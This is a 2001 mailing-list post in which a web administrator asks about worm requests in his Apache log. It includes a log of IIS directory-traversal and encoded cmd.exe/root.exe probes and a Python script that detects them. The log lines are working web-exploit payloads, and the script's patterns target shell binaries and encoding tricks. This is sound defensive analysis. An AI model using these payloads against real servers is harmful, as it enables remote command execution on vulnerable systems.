Strange content in httpd access log

Tomaz Zupan tomaz.zupan at orpo.si
Tue Oct 2 09:58:30 CEST 2001


Hello,

I found this in the log. I assume the worm is aimed at Windows machines. How
can I find out which one it is, and what can I do about it? The address is
supposedly from an Egyptian university.

Regards, Tomaž Zupan
Administrator
ORPO, d.o.o., Kranj

-------------- next part --------------
195.246.41.20 - - [01/Oct/2001:12:35:36 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
195.246.41.20 - - [01/Oct/2001:12:35:41 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
195.246.41.20 - - [01/Oct/2001:12:35:43 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
195.246.41.20 - - [01/Oct/2001:12:35:48 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
195.246.41.20 - - [01/Oct/2001:12:35:59 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
195.246.41.20 - - [01/Oct/2001:12:36:01 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
195.246.41.20 - - [01/Oct/2001:12:36:09 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
195.246.41.20 - - [01/Oct/2001:12:36:13 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
195.246.41.20 - - [01/Oct/2001:12:36:15 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
195.246.41.20 - - [01/Oct/2001:12:36:16 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
195.246.41.20 - - [01/Oct/2001:12:36:18 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
195.246.41.20 - - [01/Oct/2001:12:36:29 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
195.246.41.20 - - [01/Oct/2001:12:36:36 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
195.246.41.20 - - [01/Oct/2001:12:36:41 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
195.246.41.20 - - [01/Oct/2001:12:36:43 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
195.246.41.20 - - [01/Oct/2001:12:36:44 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
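
A triage sketch for log lines like those in the attachment above (an added example, not part of the original message): it peels percent-encoding layers from each request target, flags command-shell probes, and lists any that received a non-error status. The function names and the benign sample line are made up for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Apache common/combined log line: client, request target, status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')
OVERLONG_RE = re.compile(r"%c[01]%[0-9a-f]{2}", re.I)  # C0/C1 lead bytes: never valid UTF-8
TARGET_RE = re.compile(rb"(cmd|root)\.exe", re.I)

# Three lines copied from the log in the post, plus one constructed benign request
SAMPLE = [
    '195.246.41.20 - - [01/Oct/2001:12:35:36 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"',
    '195.246.41.20 - - [01/Oct/2001:12:35:59 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"',
    '195.246.41.20 - - [01/Oct/2001:12:36:18 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"',
    '192.0.2.10 - - [01/Oct/2001:12:40:00 +0200] "GET /index.html HTTP/1.0" 200 1024 "-" "-"',
]

def decode_layers(path, max_rounds=4):
    """Percent-decode until stable; return (bytes, number of rounds that changed the data)."""
    data, rounds = path.encode("utf-8"), 0
    while rounds < max_rounds and unquote_to_bytes(data) != data:
        data, rounds = unquote_to_bytes(data), rounds + 1
    return data, rounds

def classify(request):
    """Return the reasons a request target looks like a Windows command-shell probe."""
    path = request.split("?", 1)[0]
    decoded, rounds = decode_layers(path)
    checks = {
        "shell-binary": TARGET_RE.search(decoded),
        "double-encoding": rounds > 1,
        "overlong-utf8": OVERLONG_RE.search(path),
        "traversal": b"../" in decoded or b"..\\" in decoded,
    }
    return {name for name, hit in checks.items() if hit}

def scan(lines):
    """Per client: probe count, reasons seen, and targets that did not get a 4xx/5xx."""
    report = defaultdict(lambda: {"probes": 0, "reasons": set(), "answered": []})
    for line in lines:
        m = LINE_RE.match(line)
        reasons = classify(m.group(2)) if m else set()
        if reasons:
            entry = report[m.group(1)]
            entry["probes"] += 1
            entry["reasons"] |= reasons
            if int(m.group(3)) < 400:
                entry["answered"].append(m.group(2))
    return dict(report)
```

An empty `answered` list for a client means every flagged request was rejected with an error status, as with the 404 and 400 responses in the log above.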